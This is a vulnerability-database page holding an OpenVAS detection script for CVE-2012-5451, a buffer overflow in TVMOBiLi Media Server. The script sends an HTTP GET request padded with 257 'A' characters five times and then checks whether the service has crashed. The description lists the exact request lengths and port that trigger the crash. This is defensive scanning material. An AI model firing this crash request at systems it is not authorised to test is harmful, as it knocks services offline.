Lucene search

K
openvasCopyright (C) 2012 Greenbone AGOPENVAS:1361412562310803125
HistoryDec 10, 2012 - 12:00 a.m.

TVMOBiLi Media Server HTTP Request Multiple BOF Vulnerabilities

2012-12-1000:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
17

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

7

Confidence

Low

EPSS

0.725

Percentile

98.1%

TVMOBiLi Media Server is prone to multiple buffer overflow vulnerabilities.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.803125");
  script_version("2023-07-21T05:05:22+0000");
  script_cve_id("CVE-2012-5451");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2012-12-10 10:36:49 +0530 (Mon, 10 Dec 2012)");
  script_name("TVMOBiLi Media Server HTTP Request Multiple BOF Vulnerabilities");

  script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_analysis");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_family("Denial of Service");
  script_tag(name:"solution_type", value:"VendorFix");
  script_dependencies("gb_get_http_banner.nasl");
  script_require_ports("Services/www", 30888);
  script_mandatory_keys("TVMOBiLi/banner");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute the
  arbitrary code or cause a DoS (Denial of Service) and potentially
  compromise a vulnerable system.");

  script_tag(name:"affected", value:"TVMOBiLi Media Server version 2.1.0.3557 and prior");

  script_tag(name:"insight", value:"Improper handling of URI length within the 'HttpUtils.dll' dynamic-link
  library. A remote attacker can send a specially crafted HTTP GET request
  of 161, 257, 255  or HTTP HEAD request of 255, 257 or 260 characters long
  to 30888/TCP port and cause a stack-based buffer overrun that will crash
  tvMobiliService service.");

  script_tag(name:"solution", value:"Update to TVMOBiLi Media Server 2.1.3974 or later.");

  script_tag(name:"summary", value:"TVMOBiLi Media Server is prone to multiple buffer overflow vulnerabilities.");

  script_xref(name:"URL", value:"http://secunia.com/advisories/51465/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56853");
  script_xref(name:"URL", value:"http://dev.tvmobili.com/changelog.php");
  script_xref(name:"URL", value:"http://seclists.org/bugtraq/2012/Dec/54");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/23254/");
  script_xref(name:"URL", value:"http://forum.tvmobili.com/viewtopic.php?f=7&t=55117");

  script_xref(name:"URL", value:"http://www.tvmobili.com/");
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default:30888);
banner = http_get_remote_headers(port:port);
if("Server: " >!< banner && "TVMOBiLi UPnP Server/" >!< banner){
  exit(0);
}

req = http_get(item:string("/__index"), port:port);
res = http_keepalive_send_recv(port:port, data:req);

if('>TVMOBiLi' >!< res && 'TVMOBiLi LTD' >!< res){
  exit(0);
}

req = http_get(item:string("/", crap(data: "A", length: 257)), port:port);

## Send the attack request multiple time
for(i=0; i<5; i++){
  res = http_send_recv(port:port, data:req);
}

banner = http_get_remote_headers(port:port);

if(!banner && "TVMOBiLi UPnP Server/" >!< banner)
{
  security_message(port);
  exit(0);
}

## Some time even application crashed
## It  responds and gives banner.
## So cross check with the content of the page
req = http_get(item:string("/__index"), port:port);
res = http_send_recv(port:port, data:req);

## if did not get anything from the server report the warning
if(!res &&  '>TVMOBiLi' >!< res && 'TVMOBiLi LTD' >!< res){
  security_message(port:port);
  exit(0);
}

exit(99);

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

AI Score

7

Confidence

Low

EPSS

0.725

Percentile

98.1%